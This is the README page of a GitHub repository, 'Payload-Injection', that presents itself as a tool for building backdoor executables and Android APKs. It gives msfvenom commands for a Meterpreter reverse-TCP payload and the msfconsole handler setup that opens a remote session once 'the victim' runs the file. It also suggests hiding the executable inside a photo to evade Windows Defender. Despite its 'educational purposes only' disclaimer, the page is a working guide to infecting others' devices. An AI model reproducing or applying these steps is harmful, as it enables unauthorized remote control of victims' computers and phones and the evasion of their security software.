Skip to content

Welcome everyone, First of all, this tool is for educational purposes only, and our goal is not to make people victims or cause any kind of problems. And we are not responsible for any damages due to improper use This is a payload creation machine Tool , To back something like back door and so one to completely remote a PC or android phone Just …

Notifications You must be signed in to change notification settings

Essam0o/Payload-Injection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 

Repository files navigation

[+]Warning!!


Welcome everyone

This tool is for educational purposes only, and our goal is not to make people victims or cause any kind of danger we are not responsible for any damages due to bad use

[+]About


This is a payload creation machine Tool , To make something like back door and so one to completely remote a PC or android phone Just one click on the file "exe, apk" and u will be able to open a session and tunnel with your victim’s device with msfcosnsole Have a good time

Good bye my friend …

Screenshot 2022-09-19 133233

[+]How to Download

open you terminal as root " be careful with your path "

git clone https://github.com/Essam0o/Payload-Injection.git

[+]How to Run


After preparing your payload via Payload-injection tool you can open msfconsole and lunch your paylaod which has been created open your terminal as a root in any path and type

sudo su

msfvenom -p windows/meterpreter/reverse_tcp -f exe lhost = your ip lport = 4444 > FileName .exe Screenshot 2022-09-19 002119

if you build up a paylaod for android you will change the windows to android and so on

u can get your ip from terminal type sudo ifconfig

Then wait to complete download the file and check your path on your os

msfconsole

wiat proccess//

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost enter your ip

set lport 4444

run

Screenshot 2022-09-19 132613

HERE WE ARE DONE OF CREATING A VIRUS ALL U NEED TO WAIT THE VICTIM TO CLICK ON THE APK OR EXE FILE

Tip

you can merge your exe file in a photo to prevent windows defenter detect the virus , or merge it by the way you like it

~Happy Hacking-Good luck

About

Welcome everyone, First of all, this tool is for educational purposes only, and our goal is not to make people victims or cause any kind of problems. And we are not responsible for any damages due to improper use This is a payload creation machine Tool , To back something like back door and so one to completely remote a PC or android phone Just …

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages